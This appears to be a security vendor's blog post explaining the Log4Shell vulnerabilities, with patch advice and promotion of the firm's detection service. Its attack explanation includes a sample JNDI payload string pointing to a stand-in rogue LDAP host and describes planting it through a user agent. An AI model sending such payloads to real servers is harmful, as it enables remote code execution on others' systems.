CyCraft
Published in

CyCraft

How CyCraft Protects Customers From Attacks Exploiting the Log4Shell Vulnerability

  • The vulnerability CVE-2021–44228, also known as Log4Shell, was announced on December 10, 2021, and was rated a 10 (out of 10) on the common vulnerability scoring system (CVSS) — a rating reserved for only the most severe vulnerabilities.
  • Following the announcement of CVE-2021–4228, CyCraft issued an emergency advisory to all CyCraft Customers outlining mitigation best practices. This advisory was updated as additional related vulnerabilities came to light.
  • Within hours, multiple attempts to exploit the vulnerability were observed in the wild by CyCraft and the wider intelligence community.
  • CyCraft leverages autonomous behavioral detection systems and human-AI collaboration to protect our customers.
  • CyCraft Customers can rest assured that CyCraft products are not affected by this vulnerability. All systems within the CyCraft Community have been thoroughly checked and tested.
  • CyCraft will continue to track and monitor the evolution of Log4Shell, developing and deploying the necessary countermeasures to keep the CyCraft Community secure.
  • Organizations using Log4j2 are strongly encouraged to update the library to the latest Log4j2 version, currently version 2.17.0 at the time of this writing. Please see below for further mitigation best practices.

CyCraft Customers can rest assured that CyCraft products are not affected by this vulnerability. All systems within the CyCraft Community have been thoroughly checked and tested. Our CyCraft MDR customers can monitor their internal network attack activities generated by attackers exploiting vulnerabilities as well as seek assistance from our AI analysts in inventorying which endpoints (Windows, Linux) or programs are at risk and assessing potential damage. CyCraft will continue to track and monitor the evolution of Log4Shell, developing and deploying the necessary countermeasures to keep the CyCraft Community secure.

Suggested Patches and Updates

Log4Shell Vulnerability Impact

Within days of the disclosure, there had been countless scans performed by attackers hunting for vulnerable systems and servers around the globe. The most well-known is the Java library called Log4j, which is a framework that provides logging and record management — developed and maintained by the Apache Foundation. Log4j is used in numerous commercial and open-source software products; the scope and extent of the impact are massive.

“[Log4Shell] is the largest and most critical single vulnerability in the past decade, [and may even be] the largest vulnerability in the history of modern computers.”
Amit Yoran, CEO of the network security company Tenable

Scans observed and contained by CyCraft AIR.

Vulnerability CVE-2021–44228

CVE-2021–44228 can be exploited remotely by unauthenticated attackers to execute arbitrary code (Remote Code Execution, or RCE). For example, an attacker could send a message containing a java naming and directory inventory (JNDI) string, such as ${jndi:ldap://roguedapserver.com/a}, allowing the attacker to execute malicious commands on the host server when the string is logged. An attacker could likewise cause this string to be logged by a server via various other more subtle means, such as renaming their user agent with the string content while visiting a webpage or app, to achieve the same end result. Even websites and apps which do not directly accept user input are vulnerable to Log4Shell attacks.

When the target server receives this connection, it will save the WebLog and execute the malicious commands stored in the Log, then possibly load malicious Java files so that the attacker can directly control the system.

Vulnerability CVE-2021–45046

After a busy week of updates, Log4j had been upgraded to Version 2.15. Although it patched vulnerability CVE-2021–44228, industry intelligence reports revealed that the Version 2.15 patch could be bypassed** in certain non-default configurations where JNDI Lookup is turned on. Hence, the CVSS rating of CVE-2021–45046 escalated from 3.7 to 9.0, going from a DoS vulnerability to RCE.

**This bypass uses an SSRF bypass technique introduced in this Black Hat talk.

Vulnerability CVE-2021–45105

However, a DoS issue has appeared in Log4j 2.16 (CVE-2021–45105). Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3) did not protect from uncontrolled recursion from self-referential lookups, allowing for attackers with control over Threat Context Map data to cause a DoS attack. This issue was fixed in Log4j 2.17.0 and 2.12.3.

How CyCraft Protects Customers From Attacks Exploiting the Log4Shell Vulnerability

CyCraft AIR hunts malicious behavior and known tactics and techniques of active and emerging threats rather than utilize block/allow signature-based lists or specific exploits. CyCraft AIR uniquely provides 24/7/365 coverage across your entire network via autonomous systems and human-AI collaboration.

CyCraft AI analysts leverage machine learning to detect, validate, and contain both known and unknown malware and threats. The CyCraft AIR sensor scans endpoints within your local network and in the cloud across Windows, Linux, and macOS environments. In addition to having already successfully detected and prevented attacks exploiting the Log4j2 vulnerability, CyCraft AIR has also proven to be highly effective in protecting both large and small organizations against advanced ransomware, cryptomining malware, Trojans, and botnets.

Above, CyCraft AIR successfully detected, validated, and contained malicious activity exploiting the Log4Shell vulnerability; thus preventing further malicious activity occurring on both the targeted endpoint and system. With each successful detection, validation, and containment, CyCraft AIR enhances its existing detection and response capabilities, providing the CyCraft Community at large with more effective and efficient coverage.

Inventorying Log4j

Most asset inventory systems do not support JAR analysis, so it is difficult to inventory Log4j versions on a large scale.

JAR inventory is extremely difficult for current IT due to traditional IT software inventory tools installing components or system packages based on MSI. However, JAR files are Java Application-level packages (not a formal system registration component) that cannot be analyzed by asset software. In order to be able to comply with the software bill of materials (SBOM), the CyCraft MDR can analyze the Java Process on the system and can accurately assist customers in inventorying internal Log4j versions as well as more accurately calculate potential impact:

CyCraft Customers can prevent cyber intrusions from escalating into business-altering incidents. From endpoint to network, from investigation to blocking, from in-house to cloud, CyCraft AIR covers all aspects required to provide small, medium, and large organizations with the proactive, intelligent, and adaptable security solutions needed to defend from all manner of both existing and emerging security threats with real-time protection and visibility across the organization.

Whether it’s on Windows, Linux, or macOS, CyCraft AIR leverages autonomous behavioral detection systems and human-AI collaboration to protect the CyCraft Community from both known active threats and unknown emerging threats.

Meet your cyber defense needs in the 2020s by engaging with CyCraft at engage@cycraft.com

CyCraft secures government agencies, police and defense organizations, Fortune Global 500 firms, top banks and financial institutions, critical infrastructure, airlines, telecommunications, hi-tech firms, SMEs, and more by being Fast / Accurate / Simple / Thorough.

CyCraft powers SOCs using innovative AI-driven technology to automate information security protection with built-in advanced managed detection and response (MDR), global cyber threat intelligence (CTI), smart threat intelligence gateway (TIG) and network detection and response (NDR), security operations center (SOC) operations software, auto-generated incident response (IR) reports, enterprise-wide Health Check (Compromise Assessment, CA), and Secure From Home services. Everything Starts From Security.

Engage with CyCraft

Blog | LinkedIn | Twitter | Facebook | CyCraft

Additional Resources

  • Learn more about cybersecurity in our CyCraft Classroom Series. Our latest article, “What is Managed Detection and Response (MDR)?” teaches the benefits of MDR, its unique selling points, and how to make better-informed decisions when choosing an MDR service or vendor.
  • Out of the 47 Representative AI Startups listed in Gartner’s AI Market Guide, 7 are based in Taiwan, and 5 are based in Hong Kong. But only 1 of the 47 Representative AI Startups focused on cybersecurity products and services — CyCraft.
  • Read our latest white paper to learn what threat actors target Taiwan, their motivations & how Taiwan organizations retain resilience against some of the most sophisticated and aggressive cyber attacks in the world.
  • Is your SOC prepared for the next decade of cyber attacks? Read our latest report on building effective SOCs in the 2020s, the challenges to overcome, and the stressors to avoid — includes research from Gartner, Inc. on why Midsize enterprises are embracing MDR providers.
  • New to the MITRE Engenuity ATT&CK Evaluations? START HERE for a fast, accurate, simple, thorough introductory guide to understanding the results.
  • Our CyCraft AIR security platform achieved a 96.15% Signal-to-Noise Ratio with zero configuration changes and zero delayed detections straight out of the box.

--

--

--

Everything Starts From Security

Recommended from Medium

Hand in the Cookie jar

CyCraft Joins International Forum of Incident Response & Security Teams

Privacy and Protection is still the name of the game.👻

Do you feel unsafe online?

7 Cyber Security Concepts Explained to a Five Year Old

Weekly report — 25.04.2022–01.05.2022

{UPDATE} Royal Blade Hack Free Resources Generator

I CONNECT, THEREFORE I AM …IN TROUBLE

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
CyCraft Technology Corp

CyCraft Technology Corp

CyCraft automates SOC ops for the Fortune Global 500, national govs, & SMEs with MDR, IR, & threat hunting solutions. Learn more at CyCraft.com

More from Medium

Log4j/Log4Shell Vulnerability Scanning and Exploit Detection in Uptycs osquery

Load Malware from Public Cloud Campaign

Self-Testing: Red Team Augmentation

Detecting memfd_create linux fileless malware with EBPF